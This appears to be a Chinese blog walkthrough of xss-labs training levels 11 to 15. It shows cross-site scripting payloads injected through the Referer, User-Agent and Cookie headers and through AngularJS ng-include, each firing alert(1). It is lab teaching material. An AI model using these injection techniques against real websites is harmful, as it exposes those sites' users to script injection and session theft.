0
点赞
收藏
分享

微信扫一扫

ChatGPT对话基本原则和玩法

千妈小语 2024-06-10 阅读 8
xss前端

第十一关(referer)

直接查看网页源代码,发现四个input被隐藏,不难看出,第四个名为t_ref的<input>标签是http头referer的参数(就是由啥地址转跳到这里的,http头的referer会记录有)

通过构造payload,配合burpsuite抓包可以得到

?keyword=&t_link" type='text'>//&t_history" type='text'>//&t_sort=" type='text'>//&t_ref=" type='text'>//

通过Burpsuite抓包,发现传参点依旧在t_sort并且发现没有referer的值,手动添加referer,payload是第十关的payload,成功绕过!

referer:&t_sort=" type='text' onclick=javascript:alert(1)>//

第十二关(uagent)

随便输入一个值,查看网页源代码,发现跟上一关差不多,只是t_ref变成了t_ua

还是像上一关一样,构造payload,配合burp抓包,再放包

?keyword=&t_link" type='text'>//&t_history" type='text'>//&t_sort=" type='text'>//&t_ua=" type='text'>//

本关通过User-Agent传值,于是修改User-Agent信息里添加onclick事件 即可绕过

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0 "type="text" onclick=javascript:alert(1)//

十三关(cookie)

查看网页原代码,发现变成了t_cook,猜测在cookie中进行传参

通过配合burp抓包得到下图

构造payload,再放包即可

Cookie: user=" type='text' onclick=javascript:alert(1)//

第十四关

查看源代码,看了其他博主的,都说网站挂了,不能演示,具体知识点请看此位xss-labs靶场-第十四关 iframe和exif xss漏洞 - FreeBuf网络安全行业门户

第十五关(ng-include文件包涵)

查看网页源代码,发现了一个新东西ng-include,去查一下用法ng-include指令用于包含外部的 HTML 文件。意思是可以打开外部的网页文件。ng-include详情请看他:AngularJS ng-include 指令 | 菜鸟教程 (runoob.com)

那就是说,如果输入第一关的路径,就可以跳转到第一关,输入第一关的过关信息即可成功,尝试一下,自己输入<script>alert(11)</script> 发现<>被转义了,但是用<img>标签可以成功绕过

构造payload

?src='level1.php?name=<img src=1 onerror=alert(1)>'
举报

相关推荐

设计模式的基本原则

0 条评论